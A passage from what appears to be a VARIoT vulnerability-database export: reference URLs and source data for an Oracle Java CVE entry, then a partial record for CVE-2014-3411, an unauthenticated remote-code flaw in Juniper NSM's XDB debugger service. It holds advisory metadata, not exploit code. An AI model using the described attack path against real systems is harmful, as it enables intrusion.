"https://www.redhat.com/security/data/cve/cve-2013-2429.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1713.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5072.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1718.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1481.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1537.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1717.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1531.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2432.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1491.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2383.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2418.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0547.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1563.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2424.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2433.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1716.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5083.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1533.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3143.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1725.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2417.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2394.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1682.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2430.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0551.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1719.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2384.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2420.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2440.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1475.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0429.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0437" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0438" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0431.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0444.html" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2013:0246" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1724-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4823" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3143" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4822" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5069" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4820" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5071" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5072" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3159" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5073" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0873.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3548.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3521" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3556.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3563.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3546" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3551.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0497.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0500.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3389.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3561.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0863.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0499.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0862" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0867.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0507.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3552.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0814.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3547.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3549" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0503.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3554.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3549.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3553" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3516.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0871.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3554" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0868.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3389" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0873" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3548" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3521.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3547" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3553.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3545" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0802.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0865.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3516" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3545.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0862.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3561" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3556" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3544.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0867" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0506.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0501.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0869" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3560.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3550" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3557.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0865" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0502.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0498.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3560" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3546.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3552" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3544" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0869.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0863" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3550.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-5035.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3557" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0505.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0871" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0868" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0814" }, { "trust": 0.1, "url": "http://secunia.com/advisories/43627/#comments" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/evm/" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/section_179/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/43627/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/./vuls/hs11-003/index.html" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43627" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0169" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1481" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1724-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.1-2ubuntu0.12.04.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0448" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.1-2ubuntu0.10.04.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0430" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.1-2ubuntu0.11.10.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u13-2.3.6-0ubuntu0.12.10.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0437.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-0626.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0422" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1484.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3174.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1485.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3174" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0449.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0441" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0450" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0440" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1480" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0435" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1478" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0425" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0432" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0424" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0428" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0442" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0426" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0443" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1476" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0434" }, { "trust": 0.1, "url": "http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-february/021708.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1475" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0429" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0433" }, { "trust": 0.1, "url": "http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.5/news" } ], "sources": [ { "db": "CERT/CC", "id": "VU#858729" }, { "db": "VULMON", "id": "CVE-2013-0440" }, { "db": "BID", "id": "57712" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "120166" }, { "db": "PACKETSTORM", "id": "99047" }, { "db": "PACKETSTORM", "id": "120971" }, { "db": "PACKETSTORM", "id": "120334" }, { "db": "PACKETSTORM", "id": "120735" }, { "db": "PACKETSTORM", "id": "120204" }, { "db": "PACKETSTORM", "id": "120167" }, { "db": "NVD", "id": "CVE-2013-0440" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#858729" }, { "db": "VULMON", "id": "CVE-2013-0440" }, { "db": "BID", "id": "57712" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "120166" }, { "db": "PACKETSTORM", "id": "99047" }, { "db": "PACKETSTORM", "id": "120971" }, { "db": "PACKETSTORM", "id": "120334" }, { "db": "PACKETSTORM", "id": "120735" }, { "db": "PACKETSTORM", "id": "120204" }, { "db": "PACKETSTORM", "id": "120167" }, { "db": "NVD", "id": "CVE-2013-0440" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-02-01T00:00:00", "db": "CERT/CC", "id": "VU#858729" }, { "date": "2013-02-02T00:00:00", "db": "VULMON", "id": "CVE-2013-0440" }, { "date": "2013-02-01T00:00:00", "db": "BID", "id": "57712" }, { "date": "2013-10-23T22:58:21", "db": "PACKETSTORM", "id": "123735" }, { "date": "2013-10-23T22:57:57", "db": "PACKETSTORM", "id": "123734" }, { "date": "2013-02-09T03:17:18", "db": "PACKETSTORM", "id": "120166" }, { "date": "2011-03-07T08:03:39", "db": "PACKETSTORM", "id": "99047" }, { "date": "2013-03-27T14:12:55", "db": "PACKETSTORM", "id": "120971" }, { "date": "2013-02-15T05:00:41", "db": "PACKETSTORM", "id": "120334" }, { "date": "2013-03-11T22:51:48", "db": "PACKETSTORM", "id": "120735" }, { "date": "2013-02-12T02:52:01", "db": "PACKETSTORM", "id": "120204" }, { "date": "2013-02-09T03:17:39", "db": "PACKETSTORM", "id": "120167" }, { "date": "2013-02-02T00:55:02.160000", "db": "NVD", "id": "CVE-2013-0440" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-14T00:00:00", "db": "CERT/CC", "id": "VU#858729" }, { "date": "2017-09-19T00:00:00", "db": "VULMON", "id": "CVE-2013-0440" }, { "date": "2017-08-11T18:10:00", "db": "BID", "id": "57712" }, { "date": "2022-05-13T14:52:57.643000", "db": "NVD", "id": "CVE-2013-0440" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "57712" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#858729" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "57712" } ], "trust": 0.3 } }
var-201405-0180
Vulnerability from variot
Unspecified vulnerability in the NSM XDB service in Juniper NSM before 2012.2R8 allows remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the XDB service. The issue lies in the ability to connect to the service with a remote debugger. An attacker can leverage this vulnerability to execute code under the context of the Java service, which can then be used in conjunction with a privilege escalation vulnerability to gain root privileges
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201405-0180", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "network and security manager software", "scope": "eq", "trust": 1.6, "vendor": "juniper", "version": "2012.2" }, { "model": "nsm3000", "scope": "eq", "trust": 1.0, "vendor": "juniper", "version": null }, { "model": "nsmexpress", "scope": "eq", "trust": 1.0, "vendor": "juniper", "version": null }, { "model": "network and security manager software", "scope": "lte", "trust": 1.0, "vendor": "juniper", "version": "2012.2" }, { "model": "nsm", "scope": "lt", "trust": 0.8, "vendor": "juniper", "version": "2012.2r8" }, { "model": "network and security manager", "scope": null, "trust": 0.7, "vendor": "juniper", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-297" }, { "db": "JVNDB", "id": "JVNDB-2014-002564" }, { "db": "NVD", "id": "CVE-2014-3411" }, { "db": "CNNVD", "id": "CNNVD-201405-316" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:*:r7:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "2012.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:juniper:network_and_security_manager_software:2012.2:r5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:juniper:nsm3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:juniper:nsmexpress:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3411" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-14-297" } ], "trust": 0.7 }, "cve": "CVE-2014-3411", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "CVE-2014-3411", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 1.5, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-71351", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, 